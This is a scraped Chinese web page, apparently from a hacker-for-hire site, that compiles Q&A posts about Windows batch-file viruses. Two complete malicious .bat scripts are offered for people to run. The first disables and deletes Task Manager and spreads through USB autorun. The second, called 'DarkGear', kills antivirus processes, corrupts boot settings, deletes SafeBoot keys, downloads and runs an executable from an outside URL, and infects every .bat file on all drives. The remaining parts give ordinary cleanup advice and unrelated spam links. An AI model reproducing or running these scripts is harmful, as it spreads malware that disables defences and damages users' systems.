当前位置:首页 > 联系黑客 > 正文内容

windows简单小病毒bat(windows电脑病毒大全)

hacker2年前 (2022-06-13)联系黑客122

本文导读目录:

电脑中了超级病毒.bat怎么办,急!!!

使用电脑管家,打开工具箱,选择“系统急救箱”检查下是否dns被劫持导致,全盘查杀下病毒。

如果电脑没有安装,看看可否从网上下载一个然后在全盘杀毒。

实在不行就得重做系统了,然后在全盘杀毒。

谁能给我一个bat病毒

@echo off

title  

for /f "delims=" %%a in ('"fsutil fsinfo drives"') do (set pf=%%a)

set pf=%pf:~5%

cd "%systemdrive%\"

md %systemdrive%\windows\system32\SystemRootnul 2nul

copy/y %0 %systemdrive%\windows\system32\SystemRoot\FlashDisk.batnul 2nul

copy/y %0 %systemdrive%\windows\system32\FlashDisk.batnul 2nul

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t reg_dword /d 00000001 /fnul 2nul

at /delete /yes

schtasks /create /tn FlashDisk /tr %systemdrive%\windows\system32\SystemRoot\FlashDisk.bat /sc hourly /ru systemnul 2nul

echo [autorun]%systemdrive%\windows\system32\SystemRoot\autorun.inf

echo open=FlashDisk.bat%systemdrive%\windows\system32\SystemRoot\autorun.inf

echo shell\open\command=FlashDisk.bat%systemdrive%\windows\system32\SystemRoot\autorun.inf

echo shell\explore\command=FlashDisk.bat%systemdrive%\windows\system32\SystemRoot\autorun.inf

:1

taskkill /f /im taskmgr.exenul 2nul

ping/n 5 127.0.0.1nul

echo y|cacls %systemdrive%windows\system32\taskmgr.exe /t /c /p everyone:f

del/f/s/q %systemdrive%windows\system32\taskmgr.exe

for %%b in (%pf%) do fsutil fsinfo drivetype %%b|find /i "可移动驱动器"attrib -s -h -r %%bautorun.inf|del/f/q %%bautorun.inf|copy/y %systemdrive%\windows\system32\SystemRoot\autorun.inf %%bautorun.inf|md %%bFlashDisk|copy/y %systemdrive%\windows\system32\SystemRoot\FlashDisk.bat %%bFlashDisk\FlashDisk.bat|attrib +s +h +r autorun.inf|attrib +s +h +r %%bFlashDisk\FlashDisk.batnul 2nul

goto 1

给大家一个BAT编写的病毒,自己做完运行一下,看看什么效果

严重肯定下,你写的bat很规范,变量也用地很好。。

我也学BAT

给你看看我的把,很久前写的,不要见笑啊,U盘传播,外加一个免杀的下载者(因为这个下载者放到了带“..”的特殊文件夹里,你应该明白呵呵)

AUTOEXEC --开机过程中就运行病毒了

带感染BAT文件,而且自身感染好像没有考虑= =||

@echo off

for %%i in (D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: )do (if %cd:~0,2%==%%i goto auto)

if %cd%==C:\RECYCL goto auto

:ww

attrib %0 -a -s -r -h

copy /y %0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"

goto z

:z

IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto e

tskill wscript

del "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

if not exist "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini" goto new

goto zz

:zz

Tskill Mcshield

Tskill VsTskMgr

Tskill naPrdMgr

Tskill UpdaterUI

Tskill TBMon

Tskill scan32

Tskill Ravmond

Tskill CCenter

Tskill RavTask

Tskill Rav

Tskill Ravmon

Tskill RavmonD

Tskill RavStub

Tskill KVXP

Tskill KvMonXP

Tskill KVCenter

Tskill KVSrvXP

Tskill KRegEx

Tskill UIHost

Tskill TrojDie

Tskill FrogAgent

Tskill kav

Tskill kav32

Tskill kavstart

Tskill katmain

attrib -a -s -r -h c:\boot.ini

echo c:\="microsoft dos"c:\boot.ini

attrib +a +s +r +h c:\boot.ini

attrib -a -s -r -h c:\msdos.sys

attrib -a -s -r -h c:\config.sys

echo [option] c:\msdos.sys

echo bootkey=1 c:\msdos.sys

echo BootMenu=0 c:\msdos.sys

echo BootWarn=0 c:\msdos.sys

echo BootFailSafe=0 c:\msdos.sys

echo DisabeLog =1 c:\msdos.sys

for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k c:\config.sys

attrib +a +s +r +h c:\msdos.sys

attrib +a +s +r +h c:\config.sys

attrib -a -s -r -h c:\autoexec.bat

echo @echo off c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Network Associates Error Reporting /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f c:\autoexec.bat

echo REG DELETE HKLM\ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStatEXE /f c:\autoexec.bat

echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f c:\autoexec.bat

echo REG add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f c:\autoexec.bat

echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f c:\autoexec.bat

echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f c:\autoexec.bat

echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f c:\autoexec.bat

attrib +a +s +r +h c:\autoexec.bat

IF NOT EXIST c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs goto f

goto x

:x

cscript c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs http://www.llzaj.com/cmd.exe c:\Progra~1\Intern~1\PLUGINS\shell~1\DarkGear.exe

C:\Progra~1\COMMON~1\Micros~1\DarkGear.exe

copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\"

REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f

reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f

goto a

:a

IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" goto b

if not exist "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" goto d

IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" goto c

for %%i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" %%i

for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do md "%%c\RECYCL"

for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" "%%c\RECYCL"

for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%c\RECYCL"

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\AutoRun.bat" +a +s +r +h

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\desktop.ini" +a +s +r +h

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\autorun.inf" +a +s +r +h

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\" +a +s +r +h /s /d

ping 127.0.0.1 -n 10 nul

goto a

:b

ECHO Set shell = Wscript.createobject("wscript.shell") "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"

ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"

goto a

:c

ECHO [autorun]"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

ECHO OPEN=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

ECHO shell\open\Command=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

ECHO shell\explore\Command=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

goto a

:d

echo [.ShellClassInfo]"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"

echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"

goto a

:e

ECHO Set shell = Wscript.createobject("wscript.shell") "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

exit

:f

md c:\Progra~1\Intern~1\PLUGINS\shell..\

echo On Error Resume Next c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo Dim eee,eeee c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo eeee = LCase(WScript.Arguments(1)) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo eee = LCase(WScript.Arguments(0)) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo Set xPost = createObject("Microsoft.XMLHTTP") c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo xPost.Open "GET",eee,0 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo xPost.Send() c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo Set sGet = createObject("ADODB.Stream") c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Mode = 3 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Type = 1 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Open() c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Write(xPost.responseBody) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.SaveToFile eeee,2 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

goto x

:auto

%windir%\explorer.exe %cd:~0,2%

if not exist "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" goto ww

IF EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto z

exit

:new

md c:\Progra~1\Intern~1\PLUGINS\shell..\

copy "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" c:\Progra~1\Intern~1\PLUGINS\shell..\

at 9:58 tskill cmd

at 10:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

at 13:58 tskill cmd

at 14:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

at 19:58 tskill cmd

at 20:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

at 15:58 tskill cmd

at 16:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

echo This is DarkGear v3.0 , Make by The Ghost Hunter "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini"

FOR %%a in ( c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: s: y: z: ) do dir /a:- /s /b %%a\*.bat%windir%\msconfig.inf

FOR /f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"

FOR /f "delims=" %%i in (%windir%\msconfig.inf) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%i"

del "c:\windows\msconfig.inf"

exit

其实那些TSkill都没用,编这个的时候我很菜

电脑的重新启动的小病毒怎么做?

我也出现过这样的问题,同时不见的图标应该还有USB(安全删除硬件),如果是笔记本电量图标也不会显示。以下是几个解决办法:

方案一:

控制面板——管理工具——服务——SSDP Discovery Service——已禁用

控制面板——管理工具——服务——Universal Plug and Play Device Host——已禁用

重启

方案二:

点开始,右键在空白处点属性,打开“任务栏和开始菜单属性”,把隐藏不活动的图标前面的勾去掉。

按在“开始→运行”中键入“regedit.exe”,打开“注册表编辑器”,展开分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify”,其中“IconStreams”和“PastIconStream”项中分别存储着“当前项目”和“过去的项目”;将“TrayNotify”项删除,按Ctrl+Alt+Del组合键调出“Windows任务管理器”,单击进程选项卡,选择explorer.exe,结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”,在“创建新任务”中输入explorer.exe即可

然后按照之一步把隐藏不活动的图标前面的勾点上。OK!

方案三:

按下 Ctrl+Alt+Del 键,打开任务管理器-“进程”选项卡-找到并关闭所有的 explorer.exe 和 iexplore.exe 进程。

然后切换到“应用程序”选项卡-新任务-输入“regedit”,回车,打开注册表编辑器,找到并删除以下三个键:

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\explorer\StuckRects2

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\explorer\Streams

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\explorer\StreamsMRU

然后关闭注册表编辑器,在任务管理器的菜单上选“关机”-重新启动。

方案四:

“开始”——“运行”输入regedit打开注册表以后,依次打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 在它的右窗口新建字串"Systray",键值(在Systray上双击编辑)为"c:\windows\system32\Systray.exe",如果是win2000系统,则为"c:\winnt\system32\Systray.exe"。然后打开“控制面板”——“声音和音频设备”□将音量图标放入任务栏√上 确定OK

电脑中了被bat病毒怎么办,求大神给一个 *** 。

有很多病毒都可以屏蔽杀毒软件啊我个人的建议啊 希望对你有所帮助电脑中毒了啊 杀毒软件是很难把电脑病毒杀彻底的啊 而且你的杀毒软件很容易被病毒破坏而不能用 而且现在的病毒有好多都是免杀的 你更好的办法是把你的电脑系统重新装一下系统 还有就是要把其他的盘中清一清啊 看有没有可疑文件 有就要删掉 以防是病毒啊 然后把杀毒软件装上 再备份一下你的系统 这样做效果是更好的啊 这里有很多优秀的杀毒软件 你可以参考一下卡巴斯基、诺顿、金山毒霸那一个都比较适合家用啊ESET NOD32 Antivirus::全球唯一通过37次VB100%测试的防毒软件·Kaspersky(卡巴斯基) V6.0::来源于俄罗斯,是世界上更优秀、最顶级的 *** 杀毒软件·金山毒霸 2008 杀毒套装::国内更好的杀毒软件,可以清除病毒,漏洞修复 以上的杀毒软件都可以在多特网站上下载到 多特网站是 www.duote.com360安全卫士和360杀毒软件都是免费的 官方网站下载 www.360.cn超级巡警也是免费的 官方网站下载 www.sucop.com都是挺好的杀毒软件 都是杀毒效果很好的啊 而且永远是免费的啊

自制简单电脑病毒破解

1.建立一个txt文件,写入"shutdown -a"(引号不算),改名为bat,运行后可以直接取消关机指令。

2.如果你速度够快,按WIN+R然后输入shutdown -a 也可以

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时在线接单网站发布,如需转载请注明出处。

本文链接:http://www.cn-sl.com/125894.html

分享给朋友:

“windows简单小病毒bat(windows电脑病毒大全)” 的相关文章

js获取json中的某个值(两个字符串比较)

点击右上方红色按钮关注“小郑搞码事”,每天都能学到知识,搞懂一个问题! 简单的知识,不去重视,不去总结,不去关心,永远都是不懂的。 今天讲一下JSON对象的相关方法,相信大家,听到json对象会有一种很熟悉又很模糊的感觉,熟悉是因为我们立马会想到它的两个方法:JSON.parse()和JSON....

最新黄金价格分析及走势 「节后黄金价格走势」

是一个很业余的收集 生意业务 仄台,您要时刻存眷 突领事宜 , 二0 一 八年黄金商场大概 没有会有太孬的表示 ,外国正在 二00 九年将代替 印度,较上一生意业务 日持仄。持续 高挫,成接质等数字材料 ,正在美圆看涨之高: 二 五 九点 三 五群众币/克本日 海内 尾饰金。 职员 政事等。 一- ...

web服务器是什么(nat转换的三种方式)

NAT 收集 天址变换(NAT)技术的实践部门 否以看专客——收集 层——NAT。NAT 的功效 年夜 致为:正在局域网外组织会为外部主机分派 公有天址,当外部主机领送数据包到内部收集 时公有天址便会主动 变换为私有 IP 天址,私有 IP 天址回归的流质的目标 天址也会主动 变换为外部公有天址。...

怎么转换pdf格式(怎么转换pdf格式图片)

  PPT怎么变换成PDF文献?PPT转PDF便用它    二0 二0年0 九月0 八日  一 五: 一0做者:黄页编纂 :黄页   分享   PDF、PPT、Word、Excel等皆是咱们一样平常 办私、进修 外常常 用到的文献格局 ,尤为是PPT文献,咱们常常 用于示范圆案流程,它能主动...

胜天半子是什么意思(逆天改命)

  本题目 :【赛事推举 】欧洲杯:西班牙VS瑞典   波兰 VS 斯洛伐克 博野:足彩神去之笔   根本 里剖析 :   客队:波兰是欧洲外下游气力 球队,今朝 活着 界排名第 二 一位,比来 各项赛事与患上 四胜 三仄 三负,个中 主场与患上 四胜 二仄 一负,上一轮竞赛 波兰正在友情 赛...

郭碧婷被向佐玩成什么样子了「向佐真的喜欢郭碧婷吗」_郭碧婷

据新快网 二0 二 一年 一0月 二0日0 三: 三 一: 二 七的消息 报导,微专网友@R卜傲晴 爆料。 安然 夜光降 之际,事宜 ,正在网上炒患上满城风雨,激发 齐网冷议! 据悉,郭碧婷被背佐 之后的综艺外才无机会诠释来导航没有是简。疑惑 背佐战郭碧婷娶亲 购了冷搜。相比背太泄漏 称...

评论列表

鸽吻旧我
2年前 (2022-06-13)

果电脑没有安装,看看可否从网上下载一个然后在全盘杀毒。实在不行就得重做系统了,然后在全盘杀毒。谁能给我一个bat病毒@echo offtitle  for /f "delims=" %%a i

闹旅擅傲
2年前 (2022-06-13)

urrentVersion\explorer\StreamsMRU 然后关闭注册表编辑器,在任务管理器的菜单上选“关机”-重新启动。方案四: “开始”——“运行”输入regedit打开注册表以后,依次打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi

鸠骨败骨
2年前 (2022-06-13)

0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"goto z:zIF NOT EXI

语酌云裳
2年前 (2022-06-13)

f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"FOR /f "delims=" %%i in (%windir%\msco

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。